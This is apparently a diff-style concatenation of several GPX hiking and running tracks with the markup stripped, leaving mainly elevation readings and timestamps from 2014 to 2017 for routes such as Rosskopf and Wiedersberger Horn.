+
+1073.69
+2016-05-04T10:57:42Z
+
+
+1082.18
+2016-05-04T10:59:00Z
+
+
+1124.07
+2016-05-04T11:03:49Z
+
+
+1125.25
+2016-05-04T11:04:38Z
+
+
+1142.16
+2016-05-04T11:05:44Z
+
+
+1150.12
+2016-05-04T11:07:53Z
+
+
+1221.72
+2016-05-04T11:16:04Z
+
+
+1228.67
+2016-05-04T11:17:27Z
+
+
+1250.17
+2016-05-04T11:19:57Z
+
+
+1275.19
+2016-05-04T11:22:25Z
+
+
+1279.44
+2016-05-04T11:23:32Z
+
+
+1305.48
+2016-05-04T11:25:34Z
+
+
+1328.16
+2016-05-04T11:29:57Z
+
+
+1336.99
+2016-05-04T11:32:19Z
+
+
+1362.01
+2016-05-04T11:34:09Z
+
+
+1415.58
+2016-05-04T11:41:03Z
+
+
+1440.22
+2016-05-04T11:44:37Z
+
+
+1480.6
+2016-05-04T11:49:44Z
+
+
+1509.65
+2016-05-04T11:52:58Z
+
+
+1521.57
+2016-05-04T11:55:21Z
+
+
+1519.69
+2016-05-04T11:56:45Z
+
+
+1554.66
+2016-05-04T12:01:06Z
+
+
+1566.45
+2016-05-04T12:02:50Z
+
+
+1574.22
+2016-05-04T12:04:46Z
+
+
+1581.18
+2016-05-04T12:05:43Z
+
+
+1611.15
+2016-05-04T12:08:24Z
+
+
+1610.57
+2016-05-04T12:08:58Z
+
+
+1635.85
+2016-05-04T12:11:21Z
+
+
+1660.57
+2016-05-04T12:14:32Z
+
+
+1669.19
+2016-05-04T12:16:14Z
+
+
+1680.59
+2016-05-04T12:17:08Z
+
+
+1710.19
+2016-05-04T12:21:06Z
+
+
+1725.65
+2016-05-04T12:23:21Z
+
+
+1752.56
+2016-05-04T12:26:32Z
+
+
+1769.19
+2016-05-04T12:29:19Z
+
+
+1782.69
+2016-05-04T12:38:38Z
+
+
+1814.51
+2016-05-04T12:41:52Z
+
+
+1816.09
+2016-05-04T12:42:20Z
+
+
+1816.72
+2016-05-04T12:42:56Z
+
+
+1807.84
+2016-05-04T12:43:29Z
+
+
+1831.19
+2016-05-04T12:44:53Z
+
+
+1855.18
+2016-05-04T12:48:10Z
+
+
+1880.69
+2016-05-04T12:51:01Z
+
+
+1900.69
+2016-05-04T12:54:37Z
+
+
+1907.76
+2016-05-04T12:55:28Z
+
+
+1936.65
+2016-05-04T12:59:11Z
+
+
+1970.69
+2016-05-04T13:03:53Z
+
+
+1982.19
+2016-05-04T13:06:03Z
+
+
+1989.69
+2016-05-04T13:07:53Z
+
+
+2013.5
+2016-05-04T13:09:53Z
+
+
+2024.19
+2016-05-04T13:12:57Z
+
+
+2045.65
+2016-05-04T13:15:06Z
+
+
+2048.04
+2016-05-04T13:15:34Z
+
+
+2058.92
+2016-05-04T13:17:33Z
+
+
+2071.24
+2016-05-04T13:18:46Z
+
+
+2080.18
+2016-05-04T13:20:33Z
+
+
+2085.42
+2016-05-04T13:21:45Z
+
+
+2098.18
+2016-05-04T13:24:19Z
+
+
+2094.15
+2016-05-04T13:25:24Z
+
+
+2134.53
+2016-05-04T13:31:43Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-10-14T12:59:04Z
+
+14-OKT-16 14:59:00
+
+
+
+
+
+730.74
+2016-10-14T08:03:04Z
+
+
+797.07
+2016-10-14T08:10:04Z
+
+
+808.13
+2016-10-14T08:12:16Z
+
+
+821.1
+2016-10-14T08:14:36Z
+
+
+826.87
+2016-10-14T08:16:15Z
+
+
+834.56
+2016-10-14T08:19:27Z
+
+
+839.85
+2016-10-14T08:21:23Z
+
+
+853.31
+2016-10-14T08:24:14Z
+
+
+893.68
+2016-10-14T08:29:34Z
+
+
+902.33
+2016-10-14T08:32:06Z
+
+
+916.27
+2016-10-14T08:34:04Z
+
+
+927.81
+2016-10-14T08:38:03Z
+
+
+933.1
+2016-10-14T08:40:12Z
+
+
+937.42
+2016-10-14T08:41:31Z
+
+
+948.0
+2016-10-14T08:46:03Z
+
+
+962.9
+2016-10-14T08:48:27Z
+
+
+980.68
+2016-10-14T08:51:45Z
+
+
+995.1
+2016-10-14T08:54:48Z
+
+
+1034.52
+2016-10-14T08:59:47Z
+
+
+1049.9
+2016-10-14T09:01:26Z
+
+
+1072.01
+2016-10-14T09:03:27Z
+
+
+1099.4
+2016-10-14T09:06:39Z
+
+
+1131.61
+2016-10-14T09:09:48Z
+
+
+1184.96
+2016-10-14T09:15:47Z
+
+
+1210.92
+2016-10-14T09:18:45Z
+
+
+1239.76
+2016-10-14T09:22:05Z
+
+
+1254.66
+2016-10-14T09:24:48Z
+
+
+1273.88
+2016-10-14T09:27:12Z
+
+
+1295.03
+2016-10-14T09:30:05Z
+
+
+1378.19
+2016-10-14T09:41:15Z
+
+
+1392.13
+2016-10-14T09:43:04Z
+
+
+1408.47
+2016-10-14T09:46:17Z
+
+
+1410.39
+2016-10-14T09:48:02Z
+
+
+1418.56
+2016-10-14T09:50:24Z
+
+
+1445.96
+2016-10-14T09:54:38Z
+
+
+1466.63
+2016-10-14T09:57:16Z
+
+
+1494.99
+2016-10-14T09:59:45Z
+
+
+1513.73
+2016-10-14T10:03:45Z
+
+
+1566.12
+2016-10-14T10:09:11Z
+
+
+1614.67
+2016-10-14T10:16:10Z
+
+
+1617.07
+2016-10-14T10:50:11Z
+
+
+1611.31
+2016-10-14T11:10:50Z
+
+
+1616.11
+2016-10-14T11:13:25Z
+
+
+1566.61
+2016-10-14T11:19:41Z
+
+
+1545.94
+2016-10-14T11:21:17Z
+
+
+1519.02
+2016-10-14T11:22:57Z
+
+
+1484.89
+2016-10-14T11:25:06Z
+
+
+1404.62
+2016-10-14T11:30:48Z
+
+
+1356.08
+2016-10-14T11:36:58Z
+
+
+1368.57
+2016-10-14T11:38:31Z
+
+
+1373.38
+2016-10-14T11:39:53Z
+
+
+1358.48
+2016-10-14T11:44:29Z
+
+
+1357.52
+2016-10-14T11:47:41Z
+
+
+1344.06
+2016-10-14T11:50:01Z
+
+
+1303.2
+2016-10-14T11:55:28Z
+
+
+1294.55
+2016-10-14T11:57:24Z
+
+
+1265.71
+2016-10-14T12:02:13Z
+
+
+1258.5
+2016-10-14T12:03:56Z
+
+
+1257.54
+2016-10-14T12:06:32Z
+
+
+1244.08
+2016-10-14T12:07:46Z
+
+
+1221.97
+2016-10-14T12:09:45Z
+
+
+1205.63
+2016-10-14T12:11:15Z
+
+
+1173.91
+2016-10-14T12:14:23Z
+
+
+1137.86
+2016-10-14T12:17:15Z
+
+
+1065.76
+2016-10-14T12:24:08Z
+
+
+1007.12
+2016-10-14T12:27:45Z
+
+
+981.16
+2016-10-14T12:29:47Z
+
+
+948.96
+2016-10-14T12:31:45Z
+
+
+929.73
+2016-10-14T12:33:31Z
+
+
+912.43
+2016-10-14T12:35:53Z
+
+
+890.8
+2016-10-14T12:37:42Z
+
+
+843.21
+2016-10-14T12:41:12Z
+
+
+801.4
+2016-10-14T12:45:04Z
+
+
+787.46
+2016-10-14T12:46:25Z
+ "
+"
+
+
+
+
+
+
+2016-07-19T23:15:43Z
+
+
+Hanging Garden
+
+
+
+1212.0
+2016-07-19T23:15:43Z
+
+
+
+
+0.000000
+
+1189.0
+2016-07-19T23:17:44Z
+
+
+
+
+0.871017
+
+1188.0
+2016-07-19T23:19:13Z
+
+
+
+
+8.125122
+
+1186.0
+2016-07-19T23:20:14Z
+
+
+
+
+11.247437
+
+1184.0
+2016-07-19T23:22:05Z
+
+
+
+
+10.677734
+
+1181.0
+2016-07-19T23:23:46Z
+
+
+
+
+11.248169
+
+1182.0
+2016-07-19T23:26:16Z
+
+
+
+
+12.739868
+
+1181.0
+2016-07-19T23:27:05Z
+
+
+
+
+9.931091
+
+1178.0
+2016-07-19T23:29:04Z
+
+
+
+
+6.092407
+
+1182.0
+2016-07-19T23:29:56Z
+
+
+
+
+2.189392
+
+1186.0
+2016-07-19T23:30:15Z
+
+
+
+
+6.234558
+
+1188.0
+2016-07-19T23:31:19Z
+
+
+
+
+6.772888
+
+1188.0
+2016-07-19T23:31:49Z
+
+
+
+
+0.437378
+
+1188.0
+2016-07-19T23:31:58Z
+
+
+
+
+17.132202
+
+1187.0
+2016-07-19T23:32:50Z
+
+
+
+
+20.404175
+
+1188.0
+2016-07-19T23:33:08Z
+
+
+
+
+9.276367
+
+1188.0
+2016-07-19T23:33:33Z
+
+
+
+
+5.035889
+
+1187.0
+2016-07-19T23:35:52Z
+
+
+
+
+0.893066
+
+1186.0
+2016-07-19T23:36:27Z
+
+
+
+
+12.055908
+
+1188.0
+2016-07-19T23:37:55Z
+
+
+
+
+1.578857
+
+1188.0
+2016-07-19T23:39:19Z
+
+
+
+
+5.109497
+
+1187.0
+2016-07-19T23:40:04Z
+
+
+
+
+0.977051
+
+1187.0
+2016-07-19T23:40:45Z
+
+
+
+
+8.934570
+
+1185.0
+2016-07-19T23:42:11Z
+
+
+
+
+0.518433
+
+1185.0
+2016-07-19T23:43:21Z
+
+
+
+
+6.839355
+
+1186.0
+2016-07-19T23:43:51Z
+
+
+
+
+4.180786
+
+1184.0
+2016-07-19T23:52:51Z
+
+
+
+
+4.473267
+
+1183.0
+2016-07-19T23:54:04Z
+
+
+
+
+0.817017
+
+1180.0
+2016-07-19T23:55:20Z
+
+
+
+
+6.083862
+
+1184.0
+2016-07-19T23:56:56Z
+
+
+
+
+0.158081
+
+1179.0
+2016-07-20T00:01:46Z
+
+
+
+
+5.976562
+
+1174.0
+2016-07-20T00:04:22Z
+
+
+
+
+5.142700
+
+1174.0
+2016-07-20T00:07:04Z
+
+
+
+
+5.802856
+
+1178.0
+2016-07-20T00:08:15Z
+
+
+
+
+2.593018
+
+1175.0
+2016-07-20T00:09:35Z
+
+
+
+
+6.190430
+
+1177.0
+2016-07-20T00:10:57Z
+
+
+
+
+4.172607
+
+1172.0
+2016-07-20T00:11:53Z
+
+
+
+
+2.365234
+
+1174.0
+2016-07-20T00:14:03Z
+
+
+
+
+7.125244
+
+1173.0
+2016-07-20T00:16:34Z
+
+
+
+
+9.980957
+
+1175.0
+2016-07-20T00:19:10Z
+
+
+
+
+7.265625
+
+1174.0
+2016-07-20T00:21:06Z
+
+
+
+
+8.170654 "
+"
+
+
+
+
+
+
+Garmin International
+2017-08-28T15:57:07Z
+
+
+Wiedersberger Horn
+
+
+
+
+
+
+1774.25048828125
+2017-08-27T09:03:26Z
+
+
+1863.65283203125
+2017-08-27T09:06:48Z
+
+
+1878.553466796875
+2017-08-27T09:08:37Z
+
+
+1883.840576171875
+2017-08-27T09:10:35Z
+
+
+1910.757568359375
+2017-08-27T09:14:41Z
+
+
+1933.3486328125
+2017-08-27T09:17:19Z
+
+
+1949.691162109375
+2017-08-27T09:19:46Z
+
+
+2008.331298828125
+2017-08-27T09:26:51Z
+
+
+2029.961181640625
+2017-08-27T09:31:05Z
+
+
+2069.855712890625
+2017-08-27T09:36:23Z
+
+
+2102.059814453125
+2017-08-27T09:40:53Z
+
+
+2118.40234375
+2017-08-27T09:43:23Z
+
+
+2093.408203125
+2017-08-27T09:54:17Z
+
+
+2031.8837890625
+2017-08-27T10:00:11Z
+
+
+2016.02197265625
+2017-08-27T10:02:41Z
+
+
+2002.082763671875
+2017-08-27T10:03:59Z
+
+
+1985.740478515625
+2017-08-27T10:05:36Z
+
+
+1980.93408203125
+2017-08-27T10:06:08Z
+
+
+1963.1494140625
+2017-08-27T10:08:30Z
+
+
+1949.21044921875
+2017-08-27T10:09:49Z
+
+
+1944.403564453125
+2017-08-27T10:11:18Z
+
+
+1933.829345703125
+2017-08-27T10:16:27Z
+
+
+1917.967529296875
+2017-08-27T10:18:45Z
+
+
+1911.23828125
+2017-08-27T10:21:14Z
+
+
+1898.740966796875
+2017-08-27T10:22:21Z
+
+
+1868.9404296875
+2017-08-27T10:25:21Z
+
+
+1858.846435546875
+2017-08-27T10:26:13Z
+
+
+1826.642333984375
+2017-08-27T10:30:36Z
+
+
+1820.393798828125
+2017-08-27T10:31:31Z
+
+
+1803.08984375
+2017-08-27T10:33:06Z
+
+
+1782.902099609375
+2017-08-27T10:34:43Z
+
+
+1763.1953125
+2017-08-27T10:36:24Z
+
+
+1701.190185546875
+2017-08-27T10:41:58Z
+
+
+1690.135009765625
+2017-08-27T10:42:50Z
+
+
+1672.3505859375
+2017-08-27T10:44:32Z
+
+
+1663.21826171875
+2017-08-27T10:45:40Z
+
+
+1658.411376953125
+2017-08-27T10:46:24Z
+
+
+1655.046875
+2017-08-27T10:47:05Z
+
+
+1640.146484375
+2017-08-27T10:48:26Z
+
+
+1624.765380859375
+2017-08-27T10:50:57Z
+
+
+1625.245849609375
+2017-08-27T10:58:20Z
+
+
+1622.362060546875
+2017-08-27T10:59:50Z
+
+
+1613.229736328125
+2017-08-27T11:01:15Z
+
+
+1597.367919921875
+2017-08-27T11:04:58Z
+
+
+1590.638427734375
+2017-08-27T11:05:55Z
+
+
+1583.4287109375
+2017-08-27T11:06:45Z
+
+
+1559.876220703125
+2017-08-27T11:09:00Z
+
+
+1543.05322265625
+2017-08-27T11:14:38Z
+
+
+1529.114013671875
+2017-08-27T11:17:24Z
+
+
+1495.94873046875
+2017-08-27T11:20:52Z
+
+
+1479.12548828125
+2017-08-27T11:22:23Z
+
+
+1471.915771484375
+2017-08-27T11:23:38Z
+
+
+1451.247314453125
+2017-08-27T11:26:34Z
+
+
+1426.253173828125
+2017-08-27T11:29:00Z
+
+
+1402.70068359375
+2017-08-27T11:32:11Z
+
+
+1396.932861328125
+2017-08-27T11:32:47Z
+
+
+1387.80029296875
+2017-08-27T11:33:25Z
+
+
+1365.20947265625
+2017-08-27T11:35:21Z
+
+
+1367.612548828125
+2017-08-27T11:35:47Z
+ "
+"
+
+
+67gb1442
+
+
+
+
+67gb1442 on GPSies.com
+2017-02-06T14:47:45Z
+
+67gb1442 on GPSies.com
+
+
+
+3298.0
+2016-07-16T11:14:42Z
+
+
+3265.0
+2016-07-16T11:20:56Z
+
+
+3242.0
+2016-07-16T11:23:56Z
+
+
+3214.0
+2016-07-16T11:27:16Z
+
+
+3195.0
+2016-07-16T11:31:33Z
+
+
+3179.0
+2016-07-16T11:40:43Z
+
+
+3170.0
+2016-07-16T11:42:04Z
+
+
+3135.0
+2016-07-16T11:54:47Z
+
+
+3116.0
+2016-07-16T11:57:46Z
+
+
+3103.0
+2016-07-16T11:59:13Z
+
+
+3066.0
+2016-07-16T12:03:49Z
+
+
+3055.0
+2016-07-16T12:04:59Z
+
+
+3042.0
+2016-07-16T12:06:34Z
+
+
+3034.0
+2016-07-16T12:08:21Z
+
+
+3036.0
+2016-07-16T12:11:30Z
+
+
+3031.0
+2016-07-16T12:12:22Z
+
+
+3026.0
+2016-07-16T12:17:40Z
+
+
+3023.0
+2016-07-16T12:18:30Z
+
+
+3000.0
+2016-07-16T12:20:16Z
+
+
+2967.0
+2016-07-16T12:22:56Z
+
+
+2956.0
+2016-07-16T12:24:32Z
+
+
+2863.0
+2016-07-16T12:35:26Z
+
+
+2851.0
+2016-07-16T12:37:11Z
+
+
+2824.0
+2016-07-16T12:45:38Z
+
+
+2797.0
+2016-07-16T12:49:17Z
+
+
+2747.0
+2016-07-16T12:53:34Z
+
+
+2745.0
+2016-07-16T12:53:45Z
+
+
+2744.0
+2016-07-16T12:54:37Z
+
+
+2743.0
+2016-07-16T12:56:57Z
+
+
+
+2743.0
+2016-07-16T12:57:18Z
+
+
+2740.0
+2016-07-16T12:57:38Z
+
+
+2733.0
+2016-07-16T12:58:02Z
+
+
+2682.0
+2016-07-16T13:00:31Z
+
+
+2626.0
+2016-07-16T13:03:08Z
+
+
+2617.0
+2016-07-16T13:03:34Z
+
+
+2579.0
+2016-07-16T13:06:06Z
+
+
+2570.0
+2016-07-16T13:07:58Z
+
+
+2532.0
+2016-07-16T13:10:05Z
+
+
+2514.0
+2016-07-16T13:19:25Z
+
+
+2516.0
+2016-07-16T13:20:47Z
+
+
+2515.0
+2016-07-16T13:21:24Z
+
+
+2511.0
+2016-07-16T13:22:43Z
+
+
+2515.0
+2016-07-16T13:24:10Z
+
+
+2518.0
+2016-07-16T13:25:40Z
+
+
+2538.0
+2016-07-16T13:28:45Z
+
+
+2542.0
+2016-07-16T13:29:55Z
+
+
+2547.0
+2016-07-16T13:36:06Z
+
+
+2531.0
+2016-07-16T13:37:53Z
+
+
+2531.0
+2016-07-16T13:39:39Z
+
+
+2521.0
+2016-07-16T13:40:50Z
+
+
+2496.0
+2016-07-16T13:44:03Z
+
+
+2457.0
+2016-07-16T13:48:00Z
+
+
+2455.0
+2016-07-16T13:50:08Z
+
+
+2466.0
+2016-07-16T13:52:15Z
+
+
+2476.0
+2016-07-16T13:55:20Z
+
+
+2480.0
+2016-07-16T13:56:33Z
+
+
+2475.0
+2016-07-16T13:58:56Z
+
+
+2472.0
+2016-07-16T14:00:00Z
+
+
+2460.0
+2016-07-16T14:02:27Z
+
+
+2444.0
+2016-07-16T14:04:13Z
+
+
+2443.0
+2016-07-16T14:04:59Z
+
+
+2441.0
+2016-07-16T14:05:58Z
+
+
+2429.0
+2016-07-16T14:08:19Z
+
+
+2419.0
+2016-07-16T14:09:30Z
+
+
+2415.0
+2016-07-16T14:10:02Z
+
+
+2417.0
+2016-07-16T14:10:23Z
+ "
+"
+
+
+
+
+
+
+Download GPS-Track-Analyse
+2014-07-13T03:44:39Z
+
+
+Lauf Pointe Saire II-Erweitert
+
+
+
+0.0
+2014-07-13T11:48:29Z
+
+
+61.0
+2014-07-13T11:48:45Z
+
+
+54.0
+2014-07-13T11:49:15Z
+
+
+55.0
+2014-07-13T11:50:08Z
+
+
+60.0
+2014-07-13T11:50:54Z
+
+
+56.0
+2014-07-13T11:53:14Z
+
+
+55.0
+2014-07-13T11:55:46Z
+
+
+53.0
+2014-07-13T11:56:45Z
+
+
+53.0
+2014-07-13T11:57:19Z
+
+
+58.0
+2014-07-13T11:58:13Z
+
+
+58.0
+2014-07-13T11:59:41Z
+
+
+57.0
+2014-07-13T12:00:01Z
+
+
+61.0
+2014-07-13T12:01:09Z
+
+
+57.0
+2014-07-13T12:02:33Z
+
+
+56.0
+2014-07-13T12:02:47Z
+
+
+59.0
+2014-07-13T12:03:43Z
+
+
+58.0
+2014-07-13T12:08:01Z
+
+
+54.0
+2014-07-13T12:09:45Z
+
+
+62.0
+2014-07-13T12:10:40Z
+
+
+59.0
+2014-07-13T12:11:29Z
+
+
+57.0
+2014-07-13T12:11:37Z
+
+
+55.0
+2014-07-13T12:12:42Z
+
+
+64.0
+2014-07-13T12:13:08Z
+
+
+65.0
+2014-07-13T12:13:32Z
+
+
+61.0
+2014-07-13T12:13:44Z
+
+
+62.0
+2014-07-13T12:15:19Z
+
+
+57.0
+2014-07-13T12:16:46Z
+
+
+55.0
+2014-07-13T12:19:16Z
+
+
+51.0
+2014-07-13T12:21:18Z
+
+
+55.0
+2014-07-13T12:22:18Z
+
+
+53.0
+2014-07-13T12:24:05Z
+
+
+53.0
+2014-07-13T12:25:13Z
+
+
+54.0
+2014-07-13T12:25:53Z
+
+
+49.0
+2014-07-13T12:27:47Z
+
+
+56.0
+2014-07-13T12:28:22Z
+
+
+55.0
+2014-07-13T12:28:42Z
+
+
+55.0
+2014-07-13T12:29:09Z
+
+
+58.0
+2014-07-13T12:30:29Z
+
+
+53.0
+2014-07-13T12:31:35Z
+
+
+0.0
+2014-07-13T12:37:16Z
+
+
+47.0
+2014-07-13T12:43:27Z
+
+
+49.0
+2014-07-13T12:44:09Z
+
+
+54.0
+2014-07-13T12:45:47Z
+
+
+58.0
+2014-07-13T12:47:17Z
+
+
+54.0
+2014-07-13T12:48:29Z
+
+
+51.0
+2014-07-13T12:49:40Z
+
+
+51.0
+2014-07-13T12:51:01Z
+
+
+52.0
+2014-07-13T12:52:04Z
+
+
+51.0
+2014-07-13T12:53:08Z
+
+
+52.0
+2014-07-13T12:54:00Z
+
+
+52.0
+2014-07-13T12:54:50Z
+
+
+54.0
+2014-07-13T12:56:27Z
+
+
+59.0
+2014-07-13T12:57:29Z
+
+
+60.0
+2014-07-13T12:59:15Z
+
+
+55.0
+2014-07-13T13:01:01Z
+
+
+57.0
+2014-07-13T13:03:32Z
+
+
+58.0
+2014-07-13T13:04:17Z
+
+
+58.0
+2014-07-13T13:06:16Z
+
+
+54.0
+2014-07-13T13:07:21Z
+
+
+53.0
+2014-07-13T13:08:23Z
+
+
+56.0
+2014-07-13T13:09:00Z
+
+
+60.0
+2014-07-13T13:09:23Z
+
+
+50.0
+2014-07-13T13:10:38Z
+
+
+48.0
+2014-07-13T13:11:52Z
+
+
+0.0
+2014-07-13T13:12:42Z
+ "
+"
+
+
+Rosskopf
+
+
+
+
+
+OruxMaps
+2015-10-29T11:26:26Z
+
+
+Rosskopf
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rosskopf</h2><br /><p>Startzeit: 10/29/2015 12:26</p><p>Zielzeit: 10/29/2015 14:06</p><p>Strecke: 3,4km (01:39)</p><p>Bewegungszeit: 01:06</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,1km/h</p><p>Max. Geschwindigkeit: 7km/h</p><p>Minimale Höhe: 1469m</p><p>Maximale Höhe: 2181m</p><p>Steig-Geschw.: 454m/h</p><p>Sink-Geschw.: -34,3m/h</p><p>Aufstieg: 703m</p><p>Abstieg: -1m</p><p>Steigzeit: 01:32</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1472.25
+2015-10-29T11:26:29Z
+
+
+1482.25
+2015-10-29T11:29:59Z
+
+
+1490.79
+2015-10-29T11:30:58Z
+
+
+1505.37
+2015-10-29T11:33:32Z
+
+
+1548.84
+2015-10-29T11:38:41Z
+
+
+1560.23
+2015-10-29T11:40:16Z
+
+
+1573.74
+2015-10-29T11:44:20Z
+
+
+1603.24
+2015-10-29T11:45:19Z
+
+
+1618.74
+2015-10-29T11:47:20Z
+
+
+1644.75
+2015-10-29T11:51:07Z
+
+
+1669.77
+2015-10-29T11:54:40Z
+
+
+1693.82
+2015-10-29T11:56:54Z
+
+
+1702.78
+2015-10-29T11:58:57Z
+
+
+1759.87
+2015-10-29T12:04:13Z
+
+
+1781.12
+2015-10-29T12:09:44Z
+
+
+1810.89
+2015-10-29T12:11:53Z
+
+
+1823.71
+2015-10-29T12:13:26Z
+
+
+1830.21
+2015-10-29T12:15:26Z
+
+
+1848.24
+2015-10-29T12:17:07Z
+
+
+1865.74
+2015-10-29T12:18:35Z
+
+
+1867.74
+2015-10-29T12:19:04Z
+
+
+1860.37
+2015-10-29T12:19:44Z
+
+
+1874.1
+2015-10-29T12:21:56Z
+
+
+1897.06
+2015-10-29T12:25:46Z
+
+
+1923.28
+2015-10-29T12:29:06Z
+
+
+1925.77
+2015-10-29T12:29:35Z
+
+
+1937.74
+2015-10-29T12:30:47Z
+
+
+1965.25
+2015-10-29T12:34:42Z
+
+
+1968.24
+2015-10-29T12:36:22Z
+
+
+1973.55
+2015-10-29T12:36:35Z
+
+
+2003.22
+2015-10-29T12:40:06Z
+
+
+2014.37
+2015-10-29T12:41:07Z
+
+
+2034.88
+2015-10-29T12:44:49Z
+
+
+2043.66
+2015-10-29T12:46:12Z
+
+
+2062.74
+2015-10-29T12:49:13Z
+
+
+2075.74
+2015-10-29T12:50:29Z
+
+
+2096.36
+2015-10-29T12:52:41Z
+
+
+2121.21
+2015-10-29T12:56:08Z
+
+
+2144.25
+2015-10-29T12:59:10Z
+
+
+2165.75
+2015-10-29T13:01:20Z
+
+
+2176.28
+2015-10-29T13:04:04Z
+
+
+2181.44
+2015-10-29T13:06:23Z
+ "
+"
+
+
+
+
+
+
+
+Morteratsch
+
+
+
+1894.4
+
+
+1896.5
+
+
+1899.7
+
+
+1903.8
+
+
+1917.3
+
+
+1919.4
+
+
+1925.4
+
+
+1930.9
+
+
+1947.1
+
+
+1965.0
+
+
+2000.6
+
+
+2010.5
+
+
+2012.7
+
+
+2067.8
+
+
+2125.6
+
+
+2137.8
+
+
+2140.2
+
+
+2140.2
+
+
+2144.0
+
+
+2151.0
+
+
+2152.0
+
+
+2164.2
+
+
+2170.1
+
+
+2173.0
+
+
+2175.4
+
+
+2178.9
+ "
+"
+
+
+
+
+
+
+
+~GE176C.kmz/Part b
+
+
+
+0.0
+Position 1
+
+
+0.0
+Position 2
+
+
+0.0
+Position 3
+
+
+0.0
+Position 4
+
+
+0.0
+Position 5
+
+
+0.0
+Position 6
+
+
+0.0
+Position 8
+
+
+0.0
+Position 11
+
+
+0.0
+Position 12
+
+
+0.0
+Position 14
+
+
+0.0
+Position 16
+
+
+0.0
+Position 18
+
+
+0.0
+Position 20
+
+
+0.0
+Position 22
+
+
+0.0
+Position 23
+
+
+0.0
+Position 24
+
+
+0.0
+Position 25
+
+
+0.0
+Position 29
+
+
+0.0
+Position 31
+
+
+0.0
+Position 33
+
+
+0.0
+Position 35
+
+
+0.0
+Position 38
+
+
+0.0
+Position 40
+
+
+0.0
+Position 41
+
+
+0.0
+Position 43
+
+
+0.0
+Position 45
+
+
+0.0
+Position 46
+
+
+0.0
+Position 47
+
+
+0.0
+Position 49
+
+
+0.0
+Position 52
+
+
+0.0
+Position 56
+
+
+0.0
+Position 58
+
+
+0.0
+Position 59
+
+
+0.0
+Position 60
+
+
+0.0
+Position 62
+
+
+0.0
+Position 64
+
+
+0.0
+Position 65
+
+
+0.0
+Position 66
+
+
+0.0
+Position 67
+
+
+0.0
+Position 68
+
+
+0.0
+Position 69
+
+
+0.0
+Position 71
+
+
+0.0
+Position 72
+
+
+0.0
+Position 73
+
+
+0.0
+Position 75
+
+
+0.0
+Position 77
+
+
+0.0
+Position 79
+
+
+0.0
+Position 80
+
+
+0.0
+Position 81
+
+
+0.0
+Position 82
+
+
+0.0
+Position 83
+
+
+0.0
+Position 85
+
+
+0.0
+Position 86
+
+
+0.0
+Position 87
+
+
+0.0
+Position 89
+
+
+0.0
+Position 91
+
+
+0.0
+Position 92
+
+
+0.0
+Position 96
+
+
+0.0
+Position 98
+
+
+0.0
+Position 101
+
+
+0.0
+Position 102
+
+
+0.0
+Position 105
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-25T16:18:18Z
+
+2015-10-25 17:18:09
+
+
+
+
+
+
+1067.92
+2015-10-25T13:28:47Z
+
+
+1066.71
+2015-10-25T13:29:59Z
+
+
+1065.83
+2015-10-25T13:30:08Z
+
+
+1078.64
+2015-10-25T13:31:48Z
+
+
+1088.55
+2015-10-25T13:32:44Z
+
+
+1091.08
+2015-10-25T13:32:59Z
+
+
+1103.13
+2015-10-25T13:34:07Z
+
+
+1110.63
+2015-10-25T13:34:54Z
+
+
+1115.5
+2015-10-25T13:35:21Z
+
+
+1122.59
+2015-10-25T13:36:02Z
+
+
+1139.28
+2015-10-25T13:37:43Z
+
+
+1145.2
+2015-10-25T13:44:07Z
+
+
+1163.17
+2015-10-25T13:46:00Z
+
+
+1182.02
+2015-10-25T13:48:01Z
+
+
+1216.89
+2015-10-25T13:51:22Z
+
+
+1230.84
+2015-10-25T13:52:46Z
+
+
+1258.9
+2015-10-25T13:58:07Z
+
+
+1262.44
+2015-10-25T13:58:56Z
+
+
+1280.25
+2015-10-25T14:00:28Z
+
+
+1295.86
+2015-10-25T14:01:47Z
+
+
+1329.66
+2015-10-25T14:05:07Z
+
+
+1338.25
+2015-10-25T14:06:06Z
+
+
+1367.65
+2015-10-25T14:13:52Z
+
+
+1412.2
+2015-10-25T14:18:12Z
+
+
+1415.4
+2015-10-25T14:18:41Z
+
+
+1420.56
+2015-10-25T14:19:23Z
+
+
+1422.67
+2015-10-25T14:19:41Z
+
+
+1429.0
+2015-10-25T14:20:22Z
+
+
+1443.84
+2015-10-25T14:21:50Z
+
+
+1463.55
+2015-10-25T14:23:42Z
+
+
+1468.18
+2015-10-25T14:25:14Z
+
+
+1468.62
+2015-10-25T14:25:30Z
+
+
+1470.33
+2015-10-25T14:25:47Z
+
+
+1481.91
+2015-10-25T14:27:38Z
+
+
+1495.26
+2015-10-25T14:29:06Z
+
+
+1511.92
+2015-10-25T14:31:01Z
+
+
+1517.93
+2015-10-25T15:01:48Z
+
+
+1543.71
+2015-10-25T15:04:10Z
+
+
+1555.08
+2015-10-25T15:05:07Z
+
+
+1558.09
+2015-10-25T15:06:38Z
+
+
+1562.7
+2015-10-25T15:08:08Z
+
+
+1593.36
+2015-10-25T15:15:58Z
+
+
+1591.32
+2015-10-25T15:17:41Z
+
+
+1610.58
+2015-10-25T15:19:49Z
+
+
+1626.96
+2015-10-25T15:24:24Z
+
+
+1621.26
+2015-10-25T15:25:53Z
+
+
+1605.2
+2015-10-25T15:26:42Z
+
+
+1598.98
+2015-10-25T15:27:21Z
+
+
+1571.77
+2015-10-25T15:30:18Z
+
+
+1575.65
+2015-10-25T15:31:59Z
+
+
+1576.0
+2015-10-25T15:35:02Z
+
+
+1576.84
+2015-10-25T15:36:42Z
+
+
+1574.61
+2015-10-25T15:46:36Z
+
+
+1569.4
+2015-10-25T15:47:59Z
+
+
+1570.63
+2015-10-25T15:49:08Z
+
+
+1569.4
+2015-10-25T15:50:15Z
+
+
+1584.79
+2015-10-25T15:52:44Z
+
+
+1591.0
+2015-10-25T15:53:50Z
+
+
+1595.8
+2015-10-25T15:55:04Z
+
+
+1597.2
+2015-10-25T15:55:52Z
+
+
+1587.97
+2015-10-25T15:57:41Z
+
+
+1565.69
+2015-10-25T16:00:13Z
+
+
+1557.37
+2015-10-25T16:01:05Z
+
+
+1562.72
+2015-10-25T16:02:05Z
+
+
+1553.97
+2015-10-25T16:09:48Z
+
+
+1536.98
